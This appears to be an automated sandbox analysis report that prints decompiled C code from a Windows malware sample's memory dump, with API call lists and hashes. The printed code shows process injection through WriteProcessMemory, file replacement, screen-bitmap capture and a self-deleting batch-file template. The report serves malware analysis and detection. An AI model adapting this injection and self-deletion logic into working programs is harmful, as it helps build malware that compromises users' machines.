										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t306 =  &_v876;
											_t199 = 8;
											E004159A4(_t199,  &_v876);
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											E00417114( &_v876, 0x104,  &_v540, _t306);
											_t309 = _t309 + 0x14;
											E004056A7(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
											_t286 = _v1084;
										}
									}
									E00416421(_v1052);
									_t294 = 0;
								}
								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x4230bc);
										E00416421( *0x4230d4);
										_t168 = E0041687F(E00416421( *0x4230d8) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
										 *0x4230d4 = _t168;
										__eflags = _t168 | 0xffffffff;
										 *0x4230d8 = E0041687F(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
										LeaveCriticalSection(0x4230bc);
										goto L51;
									}
									E00406B47( &_v860, _t259, 1,  &_v996);
									if(E004176C6( &_v900,  *((intOrPtr*)(_t286 - 4)), E00416F5E( *((intOrPtr*)(_t286 - 4)))) == 0) {
										goto L51;
									}
									_t261 =  &_v860;
									do {
										E00416789( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
										_t294 = _t294 + 1;
										_t261 = _t261 + 4;
									} while (_t294 < 0x10);
									 *_t261 = 0;
									GetLocalTime( &_v876);
									E0041A6A0(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
								}
								goto L51;
							} else {
								goto L9;
								L13:
								_t279 =  *_t211 & 0x0000ffff;
								if(_t279 != 4) {
									_t259 = _t211 + 4;
									_t218 = E0040F887(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
									__eflags = _t218;
									if(_t218 == 0) {
										L33:
										if(_v1028.wYear < _v1028.wSecond) {
											_t259 = _v1028.wYear;
											L9:
											_t211 = ( *_t259 & 0x0000ffff) + _t259;
											_t296 = ( *_t211 & 0x0000ffff) + _t211;
											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
											_t279 =  *_t259 & 0x0000ffff;
											_v1036 = _t259;
											_v1044 = _t211;
											_v1040 = _t296;
											if(( *_t259 & 0x0000ffff) != 4) {
												goto L11;
											} else {
												_v1060 = _v1060 & 0x00000000;
												goto L13;
											}
										}
										_t286 = _v1048;
										goto L35;
									}
									__eflags =  *_v1036 - 4;
									_t298 = _v1040;
									if( *_v1036 != 4) {
										_t54 =  &_v1056;
										 *_t54 = _v1056 + _v1060;
										__eflags =  *_t54;
									} else {
										_v1060 = _v1056;
									}
									L22:
									_t259 = _v1056 - _v1060;
									_t222 =  *(_v1048 - 0x10);
									_t291 = ( *_t298 & 0x0000ffff) - 4;
									_v1044 = _t259;
									if((_t222 & 0x00000004) == 0) {
										__eflags = _t222 & 0x00000008;
										if((_t222 & 0x00000008) != 0) {
											_t224 = E004163AC(_t259 + _t291 + _v1064 + 2,  &_v1052);
											__eflags = _t224;
											if(_t224 != 0) {
												_t301 = _v1052;
												__eflags = _t291;
												if(_t291 != 0) {
													E0041645D(_v1064 + _t301,  &(_v1040[2]), _t291);
													_t84 =  &_v1076;
													 *_t84 = _v1076 + _t291;
													__eflags =  *_t84;
												}
												_t279 = _v1044;
												_t227 = E0041645D(_v1064 + _t301,  *_t254 + _v1060, _t279);
												_t259 = _v1060;
												__eflags =  *(_t259 - 0x10) & 0x00000100;
												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
													_t228 = E0041B050(_t227, _t279);
													_t95 =  &_v1068;
													 *_t95 = _v1068 + _t228;
													__eflags =  *_t95;
													_t254 = _a8;
												} else {
													_v1064 = _v1064 + _t279;
												}
												_t229 = _v1064;
												 *((char*)(_t229 + _t301)) = 0xa;
												_t230 = _t229 + 1;
												__eflags = _t230;
												_v1064 = _t230;
												 *((char*)(_t230 + _t301)) = 0;
											}
										}
									} else {
										_v1036 =  *_a12 - _t259 + _t291;
										_t240 = E004163F1( *_a12 - _t259 + _t291);
										_v1044 = _t240;
										if(_t240 != 0) {
											_t279 = _v1060;
											_t242 = E0041645D(E0041645D(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
											_t303 = _a12;
											_t259 =  *_t254 + _v1080;
											E0041645D(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
											E00416421( *_t254);
											_v1072 = _v1072 + 1;
											 *_t254 = _v1084;
											 *_t303 = _v1076;
										}
									}
									goto L33;
								}
								if( *_t259 != _t279) {
									_t250 = _v1060;
								} else {
									_t250 =  *_a12;
								}
								_v1056 = _t250;
								goto L22;
								L11:
								_t215 = E0040F887(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
								__eflags = _t215;
								if(_t215 == 0) {
									goto L33;
								}
								_t298 = _v1040;
								_t211 = _v1044;
								_t259 = _v1036;
								goto L13;
							}
						}
						_v996 = 0x2a3f;
						_v992 = _t258;
						_t160 = E00416F5E(_t258);
						_t254 = _a8;
						_v988 = _t160;
						_v984 =  *_t254;
						_t279 = _t279 | 0x00000012;
						_v980 =  *_a12;
						_v968 = _t279;
						if(E004173A5( &_v996) != 0) {
							goto L6;
						}
						L51:
						_t286 = _t286 + 0x1c;
						_t150 =  &(_v1028.wDayOfWeek);
						 *_t150 = _v1028.wDayOfWeek - 1;
						_v1048 = _t286;
					} while ( *_t150 != 0);
					goto L52;
				}
			}

0x00410567
0x0041056d
0x00410577
0x00410a02
0x00410a09
0x00410a12
0x0041057d
0x0041057d
0x00410580
0x00410584
0x00410588
0x0041058b
0x00410590
0x00410593
0x00410599
0x004105db
0x004105de
0x004105de
0x004105e4
0x004105e9
0x004105ee
0x004105f0
0x004105f6
0x004107f8
0x004107f8
0x004107fb
0x004107ff
0x00410814
0x004108d9
0x004108db
0x004108dd
0x004108e5
0x004108e6
0x004108eb
0x004108fb
0x00410900
0x00410904
0x00410904
0x0041081a
0x0041081c
0x00410824
0x00410830
0x0041083e
0x00410842
0x00410853
0x00410868
0x00410870
0x00410877
0x00410878
0x00410882
0x00410888
0x00410893
0x0041089b
0x004108ab
0x004108b0
0x004108c2
0x004108c7
0x004108c7
0x00410853
0x0041090d
0x00410912
0x00410912
0x00410917
0x00410921
0x004109ae
0x004109ba
0x004109d0
0x004109d5
0x004109dd
0x004109e6
0x004109eb
0x00000000
0x004109eb
0x00410935
0x00410953
0x00000000
0x00000000
0x00410959
0x00410960
0x00410967
0x0041096c
0x0041096d
0x00410970
0x00410977
0x00410982
0x004109a1
0x004109a1
0x00000000
0x004105fc
0x004105fc
0x00410661
0x00410661
0x00410667
0x0041069a
0x004106a1
0x004106a6
0x004106a8
0x004107e6
0x004107ee
0x004105fe
0x00410602
0x00410605
0x0041060a
0x00410611
0x00410615
0x00410618
0x0041061c
0x00410620
0x00410627
0x00000000
0x00410629
0x00410629
0x00000000
0x00410629
0x00410627
0x004107f4
0x00000000
0x004107f4
0x004106b2
0x004106b6
0x004106ba
0x004106ca
0x004106ca
0x004106ca
0x004106bc
0x004106c0
0x004106c0
0x004106ce
0x004106d9
0x004106dd
0x004106e0
0x004106e3
0x004106e9
0x0041075b
0x0041075d
0x00410771
0x00410776
0x00410778
0x0041077a
0x0041077e
0x00410780
0x00410792
0x00410797
0x00410797
0x00410797
0x00410797
0x0041079d
0x004107ae
0x004107b3
0x004107b7
0x004107be
0x004107c9
0x004107ce
0x004107ce
0x004107ce
0x004107d2
0x004107c0
0x004107c0
0x004107c0
0x004107d5
0x004107d9
0x004107dd
0x004107dd
0x004107de
0x004107e2
0x004107e2
0x00410778
0x004106eb
0x004106f4
0x004106f8
0x004106fd
0x00410703
0x00410709
0x0041071f
0x00410724
0x00410732
0x0041073a
0x00410741
0x0041074a
0x0041074e
0x00410754
0x00410754
0x00410703
0x00000000
0x004106e9
0x0041066c
0x00410675
0x0041066e
0x00410671
0x00410671
0x00410679
0x00000000
0x00410630
0x00410648
0x0041064d
0x0041064f
0x00000000
0x00000000
0x00410655
0x00410659
0x0041065d
0x00000000
0x0041065d
0x004105f6
0x0041059b
0x004105a2
0x004105a6
0x004105ab
0x004105ae
0x004105b4
0x004105bd
0x004105c4
0x004105c8
0x004105d3
0x00000000
0x004105d9
0x004109f1
0x004109f1
0x004109f4
0x004109f4
0x004109f8
0x004109f8
0x00000000
0x00410588

APIs

InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041084A
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00410868
GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-00422FC8,?,?), ref: 00410982
EnterCriticalSection.KERNEL32(004230BC,-00422FC8,?,?), ref: 004109AE
LeaveCriticalSection.KERNEL32(004230BC,?,?), ref: 004109EB

Strings

?*, xrefs: 0041059B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: ?*
API String ID: 2400141425-3267162389
Opcode ID: 7a8bab96758f575b0ca7e7104651cf23deff2d138a5f4399124a1fd2daf129c0
Instruction ID: 093aec45270c21eec4155e6c40de1c91451f30bafe846d90150bca3185321780
Opcode Fuzzy Hash: 7a8bab96758f575b0ca7e7104651cf23deff2d138a5f4399124a1fd2daf129c0
Instruction Fuzzy Hash: 67E19CB16083419FD710DF69C880AAFB7E5FF88318F00492EF89597251D778E985CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004051A9, Relevance: 10.7, APIs: 7, Instructions: 216
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004051A9(WCHAR* __ecx, WCHAR* __edx, signed char* _a4) {
				signed short _v80;
				signed short _v260;
				char _v914;
				char _v1028;
				char _v1292;
				void* _v1812;
				short _v1816;
				char _v1820;
				signed char* _v1824;
				signed int _v1828;
				char* _v1832;
				void* _v1836;
				intOrPtr _v1840;
				intOrPtr _v1844;
				char _v1848;
				intOrPtr _v1852;
				signed int _v1856;
				signed int _v1860;
				void* _v1861;
				signed int _v1864;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t60;
				void* _t61;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t80;
				signed int _t83;
				long _t84;
				long _t85;
				signed int _t89;
				signed int _t98;
				signed int _t101;
				signed int _t108;
				signed int _t110;
				WCHAR* _t123;
				signed char _t125;
				signed char* _t131;
				signed int _t134;
				void* _t136;
				void* _t140;
				signed int _t141;

				_t129 = __edx;
				_t128 = __ecx;
				_t131 = _a4;
				_t60 = E0040679A(__ecx, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
				_v1860 = _t60;
				if(_t60 != 0) {
					_t61 =  *0x422e04; // 0x0
					_v1836 = _t61;
					_v1832 =  &_v1292;
					_v1844 = E00405005;
					_v1840 = E00405141;
					_v1824 = _t131;
					E00406A39( &_v1028);
					E0041645D( &_v1292,  &_v914, 0x102);
					_t69 =  *_t131 & 0x000000ff;
					__eflags = _t69;
					if(_t69 == 0) {
						_t71 = _v80 >> 0x10;
						__eflags = _t71;
						_v1860 = _t71;
						_t72 = _v80 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t69 == 1;
						if(_t69 == 1) {
							_v1860 = _v260 >> 0x10;
							_t72 = _v260 & 0x0000ffff;
							L7:
							_v1856 = _t72;
						}
					}
					_v1860 = _v1860 * 0xea60;
					_v1856 = _v1856 * 0xea60;
					E004164D4( &_v1028,  &_v1028, 0, 0x3fc);
					_v1824 = 0;
					_t80 = E004068C0();
					__eflags = _t80;
					if(_t80 != 0) {
						do {
							__eflags =  *_t131;
							_v1861 = 1;
							if( *_t131 != 0) {
								L24:
								_t83 = E00405B59();
								_t138 = _t83;
								__eflags = _t83;
								if(__eflags == 0) {
									goto L29;
								} else {
									_v1860 = E0041BF9B(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
									E00416421(_t138);
									__eflags = _v1864;
									if(_v1864 == 0) {
										_t131 = _a4;
										goto L33;
									} else {
										_v1828 = _v1828 & 0;
										_t108 = E00404DC9(_t128, _t129,  &_v1828, 1);
										_t131 = _a4;
										__eflags = _t108;
										if(_t108 == 0) {
											L33:
											_t125 = _v1861;
										} else {
											_t131[8] = _t131[8] | 0xffffffff;
											_t110 = E004055C6( &_v1848);
											__eflags = _t110;
											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
											E0041C3C8( &(_t131[8]));
											E00416421(_v1828);
										}
									}
									E00416421(_v1848);
									__eflags = _t125 - 2;
									if(_t125 != 2) {
										__eflags = _t125;
										if(_t125 != 0) {
											goto L29;
										} else {
											_t84 = _v1860;
										}
									} else {
										_t84 = _v1856;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								_push(0);
								E00404C88( !( ~(_v1812 & 0x0000ffff)) &  &_v1812);
								_t123 =  &(_t131[0x122]);
								_t89 = GetFileAttributesW( &_v1816);
								__eflags = _t89 - 0xffffffff;
								if(_t89 == 0xffffffff) {
									_t89 = GetFileAttributesW(0x4223a8);
									__eflags = _t89 - 0xffffffff;
									if(_t89 == 0xffffffff) {
										goto L29;
									} else {
										_t128 = 0x4223a8;
										goto L14;
									}
								} else {
									_t128 =  &_v1816;
									L14:
									_t129 = _t123;
									E004167C2(_t89 | 0xffffffff, _t128, _t129);
									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
									__eflags = _t140 - 0xffffffff;
									if(_t140 == 0xffffffff) {
										L28:
										E0041B785(_t123);
										goto L29;
									} else {
										_v1828 = E0041B75E(_t128, _t140);
										_t134 = _t129;
										CloseHandle(_t140);
										__eflags = _v1828 - 0xffffffff;
										if(_v1828 != 0xffffffff) {
											L17:
											__eflags = _t134;
											if(__eflags > 0) {
												goto L28;
											} else {
												if(__eflags < 0) {
													L20:
													_t98 = lstrcmpiW(_t123,  &_v1816);
													__eflags = _t98;
													if(_t98 == 0) {
														goto L24;
													} else {
														_t141 = E0040679A(_t128, 0x8793aef2, 2);
														__eflags = _t141;
														if(_t141 == 0) {
															L29:
															_t131 = _a4;
															_t84 = 0x7530;
														} else {
															_t101 = MoveFileExW(_t123,  &_v1816, 0xb);
															__eflags = _t101;
															if(_t101 == 0) {
																goto L29;
															} else {
																E00419BF4(_t141);
																__eflags = _t101 | 0xffffffff;
																_t128 =  &_v1820;
																_t129 = _t123;
																E004167C2(_t101 | 0xffffffff,  &_v1820, _t123);
																goto L24;
															}
														}
													}
												} else {
													__eflags = _v1824 - 0xffffffff;
													if(_v1824 > 0xffffffff) {
														goto L28;
													} else {
														goto L20;
													}
												}
											}
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												goto L28;
											} else {
												goto L17;
											}
										}
									}
								}
							}
							_t85 = WaitForSingleObject( *0x422e04, _t84);
							__eflags = _t85 - 0x102;
						} while (_t85 == 0x102);
					}
					E00419BF4(_v1852);
					_t136 = 0;
				} else {
					_t136 = 1;
				}
				E00416421(_t131);
				return _t136;
			}

0x004051a9
0x004051a9
0x004051b8
0x004051cc
0x004051d1
0x004051d7
0x004051ed
0x004051f2
0x004051fd
0x00405208
0x00405210
0x00405218
0x0040521c
0x00405236
0x0040523e
0x0040523e
0x00405240
0x00405264
0x00405264
0x00405267
0x0040526b
0x00000000
0x00405242
0x00405242
0x00405243
0x0040524f
0x00405253
0x00405273
0x00405273
0x00405273
0x00405243
0x00405281
0x00405294
0x004052a1
0x004052a8
0x004052ad
0x004052b2
0x004052b4
0x004052ba
0x004052ba
0x004052bd
0x004052c2
0x004053c2
0x004053c2
0x004053c7
0x004053c9
0x004053cb
0x00000000
0x004053cd
0x004053e0
0x004053e4
0x004053e9
0x004053ed
0x00405465
0x00000000
0x004053ef
0x004053ef
0x004053fa
0x004053ff
0x00405402
0x00405404
0x00405468
0x00405468
0x00405406
0x00405409
0x00405410
0x00405415
0x0040541c
0x0040541f
0x00405428
0x00405428
0x00405404
0x00405470
0x00405475
0x00405478
0x00405480
0x00405482
0x00000000
0x00405484
0x00405484
0x00405484
0x0040547a
0x0040547a
0x0040547a
0x00405478
0x004052c8
0x004052cf
0x004052d9
0x004052db
0x004052eb
0x004052f1
0x004052f3
0x004052f6
0x00405304
0x00405306
0x00405309
0x00000000
0x0040530f
0x0040530f
0x00000000
0x0040530f
0x004052f8
0x004052f8
0x00405311
0x00405314
0x00405316
0x00405330
0x00405332
0x00405335
0x0040542f
0x00405430
0x00000000
0x0040533b
0x00405342
0x00405346
0x00405348
0x0040534e
0x00405353
0x0040535d
0x0040535d
0x0040535f
0x00000000
0x00405365
0x00405365
0x00405372
0x00405378
0x0040537e
0x00405380
0x00000000
0x00405382
0x0040538e
0x00405390
0x00405392
0x00405435
0x00405435
0x00405438
0x00405398
0x004053a0
0x004053a6
0x004053a8
0x00000000
0x004053ae
0x004053af
0x004053b4
0x004053b7
0x004053bb
0x004053bd
0x00000000
0x004053bd
0x004053a8
0x00405392
0x00405367
0x00405367
0x0040536c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040536c
0x00405365
0x00405355
0x00405355
0x00405357
0x00000000
0x00000000
0x00000000
0x00000000
0x00405357
0x00405353
0x00405335
0x004052f6
0x00405444
0x0040544a
0x0040544a
0x004052ba
0x00405459
0x0040545e
0x004051d9
0x004051db
0x004051db
0x004051dd
0x004051ea

APIs

Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000003FC,?,?,00000102), ref: 004052F1
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0040532A
CloseHandle.KERNEL32(00000000,00000000), ref: 00405348
lstrcmpiW.KERNEL32(?,?), ref: 00405378

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
String ID:
API String ID: 503543330-0
Opcode ID: 367030b27542b8c9d3ce0f4dbea24886756557b1a3048dc74da039a791e27492
Instruction ID: a32b01b90f44adb92e35725f564f13d2e5ffac108e4c721b6bb1ab8da97a25ef
Opcode Fuzzy Hash: 367030b27542b8c9d3ce0f4dbea24886756557b1a3048dc74da039a791e27492
Instruction Fuzzy Hash: 0571D031504751ABC310EF748881BABB7E8EF81325F540A3EF994A72D1D738D9858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9CD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041C9CD(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, char _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				void* _t37;
				long _t38;
				struct HBITMAP__* _t46;
				void* _t47;
				signed int _t56;
				signed int _t57;
				BITMAPINFO** _t62;
				BITMAPINFO* _t64;

				_t57 = __edx;
				_v8 = 0;
				_t64 = E004163F1(0x428);
				if(_t64 == 0) {
					L14:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L16:
					return _v8;
				}
				_t64->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
					L13:
					E00416421(_t64);
					goto L14;
				} else {
					DeleteObject(_a24);
					asm("cdq");
					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a24 = 0;
					_t64->bmiHeader.biHeight = _t56;
					if(_t37 == 0) {
						L7:
						_t64->bmiHeader.biClrUsed = 0;
						_push(8);
						_t64->bmiHeader.biClrImportant = 0;
						L8:
						_pop(_t38);
						_t64->bmiHeader.biBitCount = _t38;
						L9:
						_t62 = _a8;
						asm("cdq");
						_t58 = _t57 & 0x00000007;
						asm("cdq");
						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
						_t64->bmiHeader.biCompression = 0;
						if(_t62 != 0) {
							 *_t62 = _t64;
						}
						_t21 =  &_a12; // 0x422e30
						_t46 = CreateDIBSection(_a4, _t64, 0,  *_t21, _a16, _a20);
						_v8 = _t46;
						if(_t46 == 0 || _t62 == 0) {
							goto L13;
						} else {
							goto L16;
						}
					}
					_t47 = _t37 - 3;
					if(_t47 == 0) {
						goto L7;
					}
					if(_t47 != 0x14) {
						goto L9;
					}
					_push(0x20);
					goto L8;
				}
			}

0x0041c9cd
0x0041c9db
0x0041c9e3
0x0041c9e7
0x0041caaf
0x0041cab2
0x0041cab7
0x0041cab7
0x0041cabd
0x0041cac4
0x0041cac4
0x0041c9fc
0x0041ca09
0x0041caa9
0x0041caaa
0x00000000
0x0041ca25
0x0041ca28
0x0041ca31
0x0041ca3c
0x0041ca3e
0x0041ca3f
0x0041ca42
0x0041ca45
0x0041ca55
0x0041ca55
0x0041ca58
0x0041ca5a
0x0041ca5d
0x0041ca5d
0x0041ca5e
0x0041ca62
0x0041ca6a
0x0041ca70
0x0041ca71
0x0041ca79
0x0041ca7e
0x0041ca81
0x0041ca86
0x0041ca88
0x0041ca88
0x0041ca90
0x0041ca98
0x0041ca9e
0x0041caa3
0x00000000
0x00000000
0x00000000
0x00000000
0x0041caa3
0x0041ca47
0x0041ca4a
0x00000000
0x00000000
0x0041ca4f
0x00000000
0x00000000
0x0041ca51
0x00000000
0x0041ca51

APIs

GetDIBits.GDI32(00000000,004081E0,00000000,00000001,00000000,00000000,00000000), ref: 0041CA05
GetDIBits.GDI32(00000000,004081E0,00000000,00000001,00000000,00000000,00000000), ref: 0041CA1B
DeleteObject.GDI32(004081E0), ref: 0041CA28
CreateDIBSection.GDI32(?,00000000,00000000,0.B,2937498D,?), ref: 0041CA98
DeleteObject.GDI32(004081E0), ref: 0041CAB7

Strings

0.B, xrefs: 0041CA90

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: BitsDeleteObject$CreateSection
String ID: 0.B
API String ID: 1423349713-1224676626
Opcode ID: 639715c4878756bfe96e7fa8cf17fd2e0175b4d6f29cb4b924d04e7ec1c56fb9
Instruction ID: b42ac40a36f795f9dff124df8d01c0ea9757dfdb62c61a7e6df4d36206b13e72
Opcode Fuzzy Hash: 639715c4878756bfe96e7fa8cf17fd2e0175b4d6f29cb4b924d04e7ec1c56fb9
Instruction Fuzzy Hash: 7931C47650020EAFDF21CF65CD84AAB7BE9EF48380B04842EF945D6660C735DD918BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004067D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004067D5(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				intOrPtr _t25;
				void _t26;
				signed int _t29;
				void _t43;
				void* _t51;
				void* _t52;

				_t52 = __esi;
				_t51 = __edi;
				_t25 =  *0x422954; // 0x400000
				_t26 = E0041AD83(_t25, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_t29 =  *0x422940; // 0x1
					_a8 = _a8 | _t29 & 0x00000014;
					_push(_t52);
					if(WriteProcessMemory(_t51, 0x422940 -  *0x422954 + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t51, 0x422954 -  *0x422954 + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00405FB6(0x422e04, _t51, _v12,  *0x422e04) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00405FB6(0x422e08, _t51, _v12,  *0x422e08) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t51, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}

0x004067d5
0x004067d5
0x004067da
0x004067e1
0x004067e8
0x004067ed
0x00406802
0x0040680f
0x00406811
0x00406811
0x00406815
0x0040681d
0x00406820
0x00406842
0x00406844
0x00406844
0x00406863
0x00406865
0x00406865
0x0040687e
0x00406880
0x00406880
0x00406899
0x0040689b
0x0040689b
0x004068a1
0x004068b8
0x004068a3
0x004068ad
0x00000000
0x004068ad
0x004067ef
0x004067ef
0x004067ef
0x004067ef
0x004068bd

APIs

Part of subcall function 0041AD83: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000), ref: 0041AD9F

DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,0041CB3C,?,00000000,?), ref: 00406807
WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,0041CB3C,?,00000000,?,?,0041CCD4,?), ref: 0040683E
WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,0041CB3C,?,00000000,?,?,0041CCD4,?,?), ref: 0040685E
VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,0041CB3C,?,00000000,?,?,0041CCD4), ref: 004068AD

Strings

T)B, xrefs: 00406848
@)B, xrefs: 00406828

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID: @)B$T)B
API String ID: 2215616122-1132917890
Opcode ID: 2844352ae7626de951a974667d5cb241385153f09ea5e6b57b1b1606b124fe24
Instruction ID: 4f4669f9f7885b1cf8020ccc2438eca68b6717a1d72e095b9ab52619e4d26b93
Opcode Fuzzy Hash: 2844352ae7626de951a974667d5cb241385153f09ea5e6b57b1b1606b124fe24
Instruction Fuzzy Hash: B021D6B2605149BADB05DBA4DE80EBF7F7CEB49348F4080B5F901F2190D3799A569B28

Uniqueness

Uniqueness Score: -1.00%

Function 00417EE1, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417EE1(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E0041B7A6(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E004171E5( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E0041B785( &_v592);
					goto L7;
				}
				_t35 = E0041B5DA( &_v592, _a4, _t31);
				E00416421(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E00417114( &_v592, 0x10e,  &_v1392,  &M00404A0C) <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E004164D4( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
					return E00417CE8( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}

0x00417efd
0x00417fef
0x00000000
0x00417fef
0x00417f11
0x00417f1d
0x00417f35
0x00417fe3
0x00417fea
0x00000000
0x00417fea
0x00417f47
0x00417f51
0x00417f59
0x00000000
0x00000000
0x00417f5f
0x00417f66
0x00417f82
0x00000000
0x00417fa3
0x00417fa5
0x00417fad
0x00417fb5
0x00417fcd
0x00417fd0
0x00000000
0x00417fde

APIs

Part of subcall function 0041B7A6: GetTempPathW.KERNEL32(000000F6,?), ref: 0041B7BD

CharToOemW.USER32 ref: 00417F11

Part of subcall function 0041B5DA: CreateFileW.KERNEL32(00417EFB,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B5F4
